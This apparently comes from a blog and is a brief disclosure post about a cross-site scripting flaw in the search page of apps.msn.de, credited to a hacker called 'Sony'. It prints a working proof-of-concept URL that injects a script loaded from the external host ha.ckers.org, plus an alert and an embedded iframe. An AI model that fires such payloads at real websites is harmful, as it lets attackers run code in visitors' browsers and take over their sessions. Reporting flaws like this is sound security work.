Search This Blog

Powered by Blogger.

Blog Archive

Labels

Msn.de vulnerable to XSS(cross site scripting)


A hacker named as "Sony" discovered a XSS vulnerability in MSN.de website that allows to run malicious javascripts in a website. The "search" page has the XSS vulnerability.

POC:
http://apps.msn.de/search#%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/_-QPvffO1gs%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E

[SOURCE]
Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability